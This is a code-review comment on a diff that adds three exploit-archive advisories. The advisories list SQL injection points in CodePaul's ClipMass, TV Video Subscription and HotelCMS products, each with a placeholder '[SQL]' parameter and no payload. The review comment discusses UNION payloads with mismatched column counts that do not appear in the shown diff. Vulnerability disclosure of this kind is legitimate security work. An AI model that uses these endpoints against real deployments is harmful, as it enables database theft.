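Review bot: Both payloads target the same URL `editwatch.php?id=[SQL]`, yet the first selects 14 columns and the second only 2; a UNION only succeeds when its column count matches the injected query, so unless that page runs two separate queries on `id`, at most one of the two is correct for that endpoint. Check whether the second payload belongs to a different script and fix its URL, or drop the one that does not work. The `Login as sales man user` precondition is useful; stating which role the dumped `users` rows belong to would make the impact (escalation from sales to admin or not) clear.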
@@ -0,0 +1,17 @@
+# # # # #
+# Exploit Title: CodePaul ClipMass - Video Portal Site - SQL Injection
+# Google Dork: N/A
+# Date: 10.02.2017
+# Vendor Homepage: http://codepaul.com/
+# Software Buy: https://codecanyon.net/item/codepaul-clipmass-video-portal-site/14681505
+# Demo: http://codepaul.com/clipmass/
+# Version: N/A
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/search?keyword=[SQL]
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41306.txt b/platforms/php/webapps/41306.txt
new file mode 100755
index 000000000..d396f3661
--- /dev/null
+++ b/platforms/php/webapps/41306.txt
@@ -0,0 +1,17 @@
+# # # # #
+# Exploit Title: TV - Video Subscription - SQL Injection
+# Google Dork: N/A
+# Date: 10.02.2017
+# Vendor Homepage: http://codepaul.com/
+# Software Buy: https://codecanyon.net/item/tv-video-subscription/13966427
+# Demo: http://codepaul.com/tv/
+# Version: N/A
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/search?keyword=[SQL]
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41307.txt b/platforms/php/webapps/41307.txt
new file mode 100755
index 000000000..561fef20d
--- /dev/null
+++ b/platforms/php/webapps/41307.txt
@@ -0,0 +1,17 @@
+# # # # #
+# Exploit Title: HotelCMS with Booking Engine - SQL Injection
+# Google Dork: N/A
+# Date: 10.02.2017
+# Vendor Homepage: http://codepaul.com/
+# Software Buy: https://codecanyon.net/item/hotelcms-with-booking-engine/12789671
+# Demo: http://codepaul.com/hotelcms/
+# Version: N/A
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/locale?locale=[SQL]
+# # # # #
\ No newline at end of file